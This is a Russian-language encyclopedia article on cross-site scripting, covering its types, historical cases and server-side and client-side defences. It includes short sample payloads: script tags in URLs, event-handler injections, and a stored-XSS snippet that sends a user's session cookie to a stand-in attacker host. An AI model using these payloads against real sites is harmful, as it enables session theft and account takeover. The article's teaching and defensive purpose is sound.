# Межсайтовый скриптинг
XSS (англ. Cross-Site Scripting — «межсайтовый скриптинг») — подтип атаки на веб-системы, заключающийся во внедрении в выдаваемую веб-системой страницу вредоносного кода (который будет выполнен на компьютере пользователя при открытии им этой страницы) и взаимодействии этого кода с веб-сервером злоумышленника. Является разновидностью атаки «Внедрение кода».
Специфика подобных атак заключается в том, что вредоносный код может использовать авторизацию пользователя в веб-системе для получения к ней расширенного доступа или для получения авторизационных данных пользователя. Вредоносный код может быть вставлен в страницу как через уязвимость в веб-сервере, так и через уязвимость на компьютере пользователя.
Для термина используют сокращение «XSS», чтобы не было путаницы с каскадными таблицами стилей, использующими сокращение «CSS».
XSS находится на третьем месте в рейтинге ключевых рисков Web-приложений, согласно OWASP 2021. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, идентификатор сессии администратора или номера платёжных документов), а там, где нет защиты от CSRF, атакующий может выполнить любые действия, доступные пользователю. Межсайтовый скриптинг может быть использован для проведения DoS-атаки.

## Справочная информация
Безопасность в Интернете обеспечивается с помощью многих механизмов, в том числе важной концепцией, известной как правило ограничения домена. Это правило разрешает сценариям, находящимся на страницах одного сайта (https://mybank.example.com), доступ к методам и свойствам друг друга без ограничений, но предотвращает доступ к большинству методов и свойств для страниц другого сайта (https://othersite.example.com).
Межсайтовый скриптинг использует известные уязвимости в web-приложениях, серверах (или в системных плагинах, относящихся к ним). Используя одну из них, злоумышленник встраивает вредоносный контент в содержание уже взломанного сайта. В результате пользователь получает объединенный контент в веб-браузере, который был доставлен из надежного источника, и, таким образом, действует в соответствии с разрешениями, предоставленными для этой системы. Сумев внедрить необходимый скрипт в веб-страницу, злоумышленник может получить повышенные привилегии в отношении работы с веб-страницами, cookies и другой информацией, хранящейся в браузере для данного пользователя.
Выражение «межсайтинговый скриптинг» первоначально означало взаимодействие уязвимого веб-приложения с сайтом злоумышленника таким образом, чтобы в контексте атакуемого домена был выполнен JavaScript-код, подготовленный злоумышленником (отражённая или хранимая XSS уязвимость). Постепенно определение стало включать в себя и другие способы внедрения кода, включая использование устойчивых и не относящихся к JavaScript языков (например, ActiveX, Java, VBScript, Flash и даже HTML), создавая путаницу среди новичков в сфере информационной безопасности.
XSS уязвимости зарегистрированы и используются с середины 1990-x годов. Известные сайты, пострадавшие в прошлом, включают такие сайты социальных сетей, как Twitter,
ВКонтакте,
MySpace,
YouTube,
Facebook и др.

## Классификация
Не существует чёткой классификации межсайтового скриптинга. Но большинство экспертов различает по крайней мере два типа XSS: «отраженные» («reflected XSS» или «Type 1») и «хранимые» («stored XSS» или «Type 2»).

### По местоположению вредоносного скрипта

#### Отражённые (непостоянные)
Атака, основанная на отражённой уязвимости, на сегодняшний день является самой распространенной XSS-атакой. Это значит, вредоносный скрипт хранится в само́м запросе, и по ошибке появляется на веб-странице без надлежащей обработки. Отражённая XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.
Пример:
```
http://example.com/search.php?q=
<
script
>
DoSomething
();</
script
>

```

Если сайт не экранирует угловые скобки, преобразуя их в «&lt;» и «&gt;», получим скрипт на странице результатов поиска.
Отражённые атаки, как правило, рассылаются по электронной почте или размещаются на Web-странице. URL приманки не вызывает подозрения, указывая на надёжный сайт, но содержит вектор XSS. Если доверенный сайт уязвим для вектора XSS, то переход по ссылке может привести к тому, что браузер жертвы начнет выполнять встроенный скрипт.

#### Хранимые (постоянные)
Хранимый XSS является наиболее разрушительным типом атаки. Хранимый XSS возможен, когда злоумышленнику удается внедрить на сервер вредоносный код, выполняющийся в браузере каждый раз при обращении к оригинальной странице. Классическим примером этой уязвимости являются форумы, на которых разрешено оставлять комментарии в HTML-формате без ограничений, а также другие сайты Веб 2.0 (блоги, вики, имиджборд), когда на сервере хранятся пользовательские тексты и рисунки. Скрипты вставляются в эти тексты и рисунки.
Фрагмент кода похищения ключа с идентификатором сессии (session ID):
```
<
script
>

document
.
location
=
"http://attackerhost.example/cgi-bin/cookiesteal.cgi?"
+
document
.
cookie

</
script
>

```

#### DOM-модели
XSS в DOM-модели возникает на стороне клиента во время обработки данных внутри JavaScript-сценария. Данный тип XSS получил такое название, поскольку реализуется через DOM (Document Object Model) — не зависящий от платформы и языка программный интерфейс, позволяющий программам и сценариям получать доступ к содержимому HTML и XML-документов, а также изменять содержимое, структуру и оформление таких документов. При некорректной фильтрации возможно модифицировать DOM атакуемого сайта и добиться выполнения JavaScript-кода в контексте атакуемого сайта.
Пример:
```
<
body
>

<
script
>
document
.
write
(
location
.
href
);</
script
>

</
body
>

```

Пример DOM-модели XSS — баг, найденный в 2011 году в нескольких JQuery-плагинах. Методы предотвращения DOM-модели XSS включают меры, характерные для традиционных XSS, но с реализацией на javascript и отправкой в веб-страницы — проверка ввода и предотвращение атаки. Некоторые фреймворки javascript имеют встроенные защитные механизмы от этих и других типов атак, например, AngularJS.

### По каналам внедрения скрипта

#### Ошибки в браузере
Bugzilla, 2004 год. В некоторых браузерах (по крайней мере, Internet Explorer) при задании URL’а
```
http://bugzilla.mozilla.org/enter_bug.cgi
?
  <script>alert('foo');</script>
```

не происходит URL-кодирования, и код
```
document
.
write
(

   
"<p>URL: "
 
+
 
document
.
location
 
+
 
"</p>"
);

```

внедрит в страницу скрипт.
Из-за ошибок браузер может выполнять скрипты в SVG, нарушать правило Same Domain Policy. Это серьёзные ошибки; после обнаружения их быстро закрывают, однако в переходный период опасными становятся практически все сайты Веб 2.0: форумы, вики, имиджборды. Если такая ошибка обнаружилась, рекомендуется, пока не вышло обновление, пользоваться другим браузером.
Бывают и более тонкие ошибки, которые проявляются при очень специфичных условиях и крупного урона не наносят. Такие ошибки могут не исправляться годами и выгоднее исправить сайт, чем ждать обновления браузера.

#### Отсутствие экранирования спецсимволов HTML
phpBB, 2002 год. Хотя URL картинок проверяется на протокол (разрешён только http:), сам URL никак не экранируется, и строкой наподобие
```
[img]
http://a.a/a
"onerror="
   javascript:alert(document.cookie)[/img]
```

можно протащить в документ пользовательский скрипт.
Намного чаще встречаются ошибки на сайтах. Чтобы браузер гарантированно не принял строку за тег HTML, требуется заэкранировать пять символов: '"&<>. Сервер может экранировать не все символы (известный недостаток PHP), либо веб-программист просто забывает заэкранировать строку.
Обычно в базах данных текст хранится неэкранированным, и экранировать требуется все пользовательские строки каждый раз, когда они встраиваются в HTML: например, если не заэкранирован URL картинки, пользователь может ввести что-то наподобие http://example.com/img.png" onmouseover="javascript:DoSomething();.
Многие сайты позволяют форматирование текста с помощью какого-либо языка разметки (HTML, BBCode, вики-разметка). Часто не проводится полный лексический анализ языка разметки, а лишь преобразование в «безопасный» HTML с помощью регулярных выражений. Это упрощает программирование, однако требует досконального понимания, какими путями скрипт может проникнуть в результирующий HTML-код.

#### Отсутствие фильтрации атрибутов и их значений в разрешённых тегах
Типичным примером будет ссылка <a href="javascript:DoSomething()">. Даже если форум позволяет внешние ссылки, не стоит пускать протоколы javascript: и data:.
Не являются XSS, но не менее вредны и другие атаки: хакер может указать в качестве адреса сервер, имеющий узкий интернет-канал, парализуя его работу большим количеством запросов, или устроить с его помощью XSRF-атаку.

#### Подмена кодировки в заголовке страницы
Современные браузеры пытаются определить кодировку страницы на ходу и интерпретируют html в соответствии с этой кодировкой. В случае, если тег <title> расположен до тега <meta> и заполняется пользовательскими данными, хакер может вставить злонамеренный html-код в кодировке UTF-7, обойдя таким образом фильтрацию таких символов, как < и ".
Для защиты от данной уязвимости следует явно указывать кодировку страницы до каких-либо пользовательских полей. HTML 5 прямо запрещает поддержку браузерами кодировки UTF-7 как потенциально опасной.

#### Социальная инженерия
Пользуясь социальной инженерией, злоумышленники добиваются того, что пользователь сам запускает вредоносный скрипт в браузере (на стороне клиента). Разработчики браузеров и веб-сайты принимают усилия по предотвращению атак такого типа.

#### Через внедрение SQL-кода
Если сайт и допускает внедрение SQL-кода, и выводит содержимое БД без всякого экранирования (то ли по незнанию, то ли в БД хранится готовый HTML-код, то ли автор точно знает, что «плохих» символов в БД нет), можно провести необычную атаку.
Внедрением SQL-кода записываем в БД «отравленную» страницу. Если кто-то получит доступ к этой строке БД, ему в браузер попадёт вредоносный скрипт. Бывают атаки и без хранения HTML в БД (отражённые) — СУБД вместо хранящегося в БД поля вернёт тот скрипт, который записан в тексте запроса.

### По способу воздействия

#### Активные
Активная XSS атака не требует каких-либо действий со стороны пользователя с точки зрения функционала веб-приложения.
Пример:
<input type=text value=a onfocus=alert(1337) AUTOFOCUS>
В данном примере показано поле ввода, у которого установлен обработчик события появления фокуса, выполняющий собственно код атаки, а также у данного поля ввода активировано свойство автоматической установки фокуса. Таким образом автоматически устанавливается фокус, что вызывает обработчик установки фокуса, содержащий код атаки. Атака является активной и выполняется автоматически, не требуя от пользователя никакой активности.

#### Пассивные (автономные)
Пассивная XSS-атака срабатывает при выполнении пользователем определённого действия (клик или наведение указателя мыши и т. п.).
Пример:
<a href='a' onmouseover=alert(1337) style='font-size:500px'>
Пример показывает гиперссылку, особым образом привлекающую внимание пользователя, и/или занимающее значительное место, повышающее вероятность наведения указателя мыши, в данном случае крупным шрифтом. У гиперссылки установлен обработчик события наведения указателя мыши, содержащий код атаки. Атака является пассивной, так как бездействует, а код атаки не выполняется в ожидании наведения указателя мыши на ссылку пользователем.

## Средства защиты

### Защита на стороне сервера
- Кодирование управляющих HTML-символов, JavaScript, CSS и URL перед отображением в браузере. Для фильтрации входных параметров можно использовать следующие функции: filter_sanitize_encoded (для кодирования URL)[28], htmlentities (для фильтрации HTML)[29].
- Кодирование входных данных. Например с помощью библиотек OWASP Encoding Project[30], HTML Purifier, htmLawed, Anti-XSS Class.
- Регулярный ручной и автоматизированный анализ безопасности кода и тестирование на проникновение. С использованием таких инструментов, как Nessus, Nikto Web Scanner и OWASP Zed Attack Proxy.
- Указание кодировки на каждой web-странице (например, ISO 8859-1 или UTF-8) до каких-либо пользовательских полей[31].
- Обеспечение безопасности cookies, которая может быть реализована путём ограничения домена и пути для принимаемых cookies, установки параметра HttpOnly[32], использованием SSL[33].
- Использование заголовка Content Security Policy, позволяющего задавать список, в который заносятся желательные источники, с которых можно подгружать различные данные, например, JS, CSS, изображения и пр.

### Защита на стороне клиента
- Регулярное обновление браузера до новой версии[18].
- Установка расширений для браузера, которые будут проверять поля форм, URL, JavaScript и POST-запросы, и, если встречаются скрипты, применять XSS-фильтры для предотвращения их запуска. Примеры подобных расширений: NoScript для FireFox, NotScripts для Chrome и Opera.